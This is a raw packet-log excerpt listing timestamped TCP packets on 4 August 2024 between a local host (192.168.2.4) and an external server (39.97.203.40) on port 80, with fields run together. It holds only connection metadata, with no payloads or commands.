                                          Aug 4, 2024 12:47:09.972965002 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.973026991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.973026991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.973176956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.973198891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.973213911 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.973227978 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.973395109 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.973395109 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.989684105 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.989731073 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.989747047 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.989789963 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.990103960 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.990128994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.990222931 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.990238905 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.990255117 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:09.990278959 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.990279913 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:09.990361929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.012733936 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.012783051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.012820005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.012950897 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.013078928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.013114929 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.013206005 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.013241053 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.013281107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.013281107 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.021548033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021620989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021657944 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021691084 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021724939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021759033 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021770000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.021770000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.021770000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.021795988 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.021848917 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.022394896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022465944 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022501945 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022536039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022574902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022572994 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.022650003 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.022958994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.022994995 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.023016930 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.023030996 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.023077011 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.032397985 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032449007 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032507896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032510042 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.032618999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032651901 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032687902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.032788038 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.032788038 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.033417940 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033471107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033508062 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033531904 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.033541918 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033577919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033597946 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.033615112 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033663988 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.033883095 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033921003 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.033967972 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.036684990 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.036765099 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.036796093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.036814928 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.037285089 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.037333012 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.037368059 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.037405014 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.037477970 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.037478924 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.037542105 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.037604094 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.046960115 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047009945 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047049999 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047090054 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.047516108 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047566891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047604084 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047638893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047674894 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047729015 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.047729969 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.047729969 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.047902107 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.047971010 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048007965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048022985 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.048041105 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048075914 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048094034 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.048111916 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048166037 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.048816919 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048846006 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048880100 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048903942 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.048913956 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048948050 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.048964024 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.048981905 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049017906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049034119 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.049664974 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049698114 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049731016 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049741983 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.049760103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049783945 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.049793959 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049828053 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049843073 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.049860954 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.049909115 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.050663948 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050698042 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050729036 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050750971 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.050764084 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050797939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050813913 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.050831079 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050863981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.050878048 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.051533937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051569939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051592112 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.051666975 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051717997 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.051800966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051852942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051887035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.051899910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.052311897 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.052345991 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.052371979 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.052381039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.052429914 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.053474903 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053633928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053668022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053721905 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.053812981 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053865910 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053870916 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.053899050 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053932905 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.053946018 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.053961992 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.054011106 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.056406021 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056549072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056585073 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056607008 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.056695938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056821108 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056854963 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056859970 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.056888103 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056916952 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.056924105 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.056972027 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.062108994 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062690020 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062737942 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062757015 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.062773943 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062808037 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062840939 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.062879086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.063019037 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.063019991 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.079974890 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080028057 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080065966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080152035 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.080152035 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.080218077 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080254078 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080288887 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080327034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.080446005 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.080446959 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.101499081 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101567030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101600885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101634979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101670980 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101741076 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.101742029 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.101871014 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.101924896 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.102143049 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.110126019 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110215902 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110239983 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.110249043 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110282898 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110307932 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.110317945 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110351086 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110366106 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.110387087 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.110431910 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.110970020 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111043930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111080885 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111114979 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111150980 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111227036 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.111227036 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.111479998 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111514091 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111548901 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.111552000 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.111604929 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.121242046 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121289968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121326923 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121484995 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.121807098 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121856928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121891022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121925116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121962070 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.121965885 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.121965885 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.122020960 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.122208118 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122245073 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122279882 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122301102 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.122313023 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122347116 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122368097 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.122381926 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.122433901 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.131207943 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131450891 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131494045 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131547928 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131582022 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131617069 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131624937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.131624937 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.131653070 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.131694078 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.135965109 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136015892 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136054039 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136140108 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136140108 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136516094 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136585951 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136622906 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136647940 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136657000 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136691093 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136704922 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136724949 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136759043 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136769056 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136792898 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136826038 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136840105 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136859894 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136893988 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136914968 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.136929989 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.136984110 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.137403965 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137438059 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137470961 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137492895 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.137505054 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137538910 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137552023 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.137573004 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.137624979 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.137939930 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138037920 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138072968 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138098001 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138107061 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138140917 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138159037 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138175011 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138211966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138225079 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138241053 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138288975 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138825893 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138860941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138895035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138912916 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138927937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138962030 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.138979912 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.138995886 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.139029980 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.139048100 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.140310049 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140366077 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.140388966 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140424967 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140477896 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.140651941 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140686035 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140718937 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140733957 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.140917063 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.140983105 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.142364025 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142419100 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142452955 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142472982 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.142682076 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142734051 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142735004 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.142785072 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142819881 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.142838001 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.147533894 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147577047 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147609949 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.147634983 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147671938 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147692919 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.147706985 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147741079 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.147763014 CEST4973580192.168.2.439.97.203.40
                                          Aug 4, 2024 12:47:10.147778034 CEST804973539.97.203.40192.168.2.4
                                          Aug 4, 2024 12:47:10.148016930 CEST4973580192.168.2.439.97.203.40
